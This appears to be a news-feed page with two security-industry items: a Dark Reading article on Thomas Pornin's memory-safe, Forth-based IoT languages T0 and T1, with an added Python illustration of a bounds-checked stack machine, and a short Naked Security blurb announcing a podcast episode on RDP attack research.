When a security researcher needs to create an application, there are many choices in terms of programming languages and frameworks. But when project requirements include SSL and an embedded Internet of Things (IoT) platform, the number of good options becomes limited. That’s why Thomas Pornin decided to build his own language.

Pornin, who is technical director and member of the cryptography services practice at NCC Group, has been thinking about programming languages, their strengths, and their weaknesses for more than 30 years. He has worked on many different, complex tech deployments and has the experience of launching an open source project, BearSSL, an SSL stack that is smaller than most SSL implementations available to developers.

The language Pornin wanted to build had two significant requirements. First, the resulting applications had to fit onto a resource-constrained IoT device and perform reasonably well. Second, applications developed in the language should not be subject to certain classes of vulnerability seen in other applications. Those vulnerabilities tend to revolve around the way a program allocates and uses memory, so Pornin focused on memory in his thinking about language security.

Getting the project started took time. “I took care to write a big specification, a 65-page document,” Pornin says. “In it, I explained how it should work and why it should work that way.”

From Spec to Language
The initial specification was the basis for T0, Pornin’s first pass at the programming language. T0 was designed to create applications that would work on an embedded system — defined as one with severely limited memory resources, a CPU that’s not very powerful, no memory management unit, and no operating system to mediate the application’s interaction with the hardware.

Pornin decided to base the design of his secure IoT language on Forth — a programming language that is oriented around the idea of stacks (memory structures where the last item pushed in is the first thing pulled out). He says the decision was partially driven by practical considerations about the discipline that stacks impose on the way memory is used, and partially by aesthetics. The stack orientation means that Forth code uses a distinctive notation (Reverse Polish Notation) familiar to anyone who used an HP calculator without the “=” key.

T0 was able to create compact, operational code. Pornin simplified the job of writing the T0 compiler by having it produce C source code as its output — code that then had to be recompiled and linked into the final executable code using an existing C compiler. It was much of what he wanted, but it was not yet secure. That waited for T1.

The Next Step
In T1, which Pornin described in a presentation at NorthSec 2019, protection for memory and restrictions on stacks were introduced. While Pornin is still working on building out the details of T1 and creating the full compiler for the language, he believes the language is moving in his desired direction.
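As an added illustration of the property the article credits to a stack discipline (this is not T0, T1 or any code by Pornin), here is a tiny Forth-style interpreter in which every value lives on one stack with a fixed ceiling and every push and pop is checked. A program that would overrun or underrun the stack fails with a clean error rather than reading or writing past the end of a buffer, which is the C failure mode the design is meant to exclude. The word set and the depth limit are assumptions.

```python
"""A bounded Forth-style stack machine with checked push/pop (added example)."""
from __future__ import annotations

from typing import Callable


class StackError(Exception):
    """Raised instead of corrupting memory when a program misuses the stack."""


class BoundedStackMachine:
    def __init__(self, max_depth: int = 8) -> None:
        self.max_depth = max_depth
        self.stack: list[int] = []
        # Word set is an assumption for the illustration: arithmetic plus stack shuffles.
        self.words: dict[str, Callable[[], None]] = {
            "+": self._binop(lambda a, b: a + b),
            "-": self._binop(lambda a, b: a - b),
            "*": self._binop(lambda a, b: a * b),
            "dup": self._dup,
            "drop": self._drop,
            "swap": self._swap,
        }

    # Every access to the stack goes through these two checked primitives.
    def push(self, value: int) -> None:
        if len(self.stack) >= self.max_depth:
            raise StackError(f"stack overflow: depth limit {self.max_depth} reached")
        self.stack.append(value)

    def pop(self) -> int:
        if not self.stack:
            raise StackError("stack underflow: pop from empty stack")
        return self.stack.pop()

    def _binop(self, fn: Callable[[int, int], int]) -> Callable[[], None]:
        def word() -> None:
            b = self.pop()
            a = self.pop()
            self.push(fn(a, b))
        return word

    def _dup(self) -> None:
        v = self.pop()
        self.push(v)
        self.push(v)

    def _drop(self) -> None:
        self.pop()

    def _swap(self) -> None:
        b = self.pop()
        a = self.pop()
        self.push(b)
        self.push(a)

    def run(self, source: str) -> list[int]:
        """Execute whitespace-separated RPN tokens; returns the final stack bottom-to-top."""
        for tok in source.split():
            if tok in self.words:
                self.words[tok]()
            else:
                try:
                    self.push(int(tok))
                except ValueError:
                    raise StackError(f"unknown word {tok!r}") from None
        return list(self.stack)


def evaluate(source: str, max_depth: int = 8) -> list[int]:
    return BoundedStackMachine(max_depth).run(source)


def fails_safely(source: str, max_depth: int = 8) -> bool:
    """True when the program is rejected with StackError rather than misbehaving."""
    try:
        evaluate(source, max_depth)
    except StackError:
        return True
    return False


if __name__ == "__main__":
    print(evaluate("3 4 + 5 *"))            # RPN for (3 + 4) * 5
    print(fails_safely("+"))                # underflow is caught
    print(fails_safely("1 " + "dup " * 8))  # a ninth value exceeds the 8-slot stack
```

The point is the two checked primitives: because no word touches the stack except through `push` and `pop`, a depth limit and an underflow check in one place hold for every program the machine can run, which is the kind of guarantee a language can give and a library cannot.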

There are already a number of languages that can be used for embedded applications. Depending on the hardware in use, C, Java ME, Go, Rust Embedded, and Forth may be possibilities. So does Pornin think other security practitioners should write their own programming languages?

“I think that anybody who is really serious about development should have the idea somewhere in their head,” he says. “They should think about what they would like to see in a programming language.” He adds with a laugh, “And it would also be good for people at large if most would stop before actually doing it.”

It is useful, though, for developers and security practitioners to understand how the compilers work and the sort of code they produce. Understanding whether they create code that makes the most of memory protection and memory structures available in the hardware can help them write more secure, more robust applications.


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/application-security/security-lessons-from-a-new-programming-language/d/d-id/1335300?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Series 2 launch episode – RDP exposed [PODCAST]

The Naked Security Podcast is back!

Everyone loved the content of our podcasts, but quite a few of you said that you found them hard to listen to.

We didn’t have a studio to record in, so the sound quality wasn’t great – you had to concentrate on the words themselves rather than their meaning.

Some of you said that it sounded as though we’d recorded our Series 1 episodes in a meeting room…

…and the reason was that we had.

Well, we heard you loud and clear, even if you couldn’t always hear us the same way – we’ve now got a brand new studio, soundproofing on the walls, new microphones and even a cool acoustic sofa. (That’s like a regular sofa, but more so.)

So, here’s our Series 2 Launch Episode, entitled RDP Exposed.

Host Anna Brading talks to Matt Boddy, Ben Jones and Mark Stockley about their latest research into RDP attacks and just how quickly crooks can (and will) find you online.

Listen now, and let us know what you think!

You can find out more about our RDP research here on Naked Security, or by reading the full report.

Listen and rate via iTunes...
Sophos podcasts on Soundcloud...
RSS feed of Sophos podcasts...

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/a2eGHCC5P5k/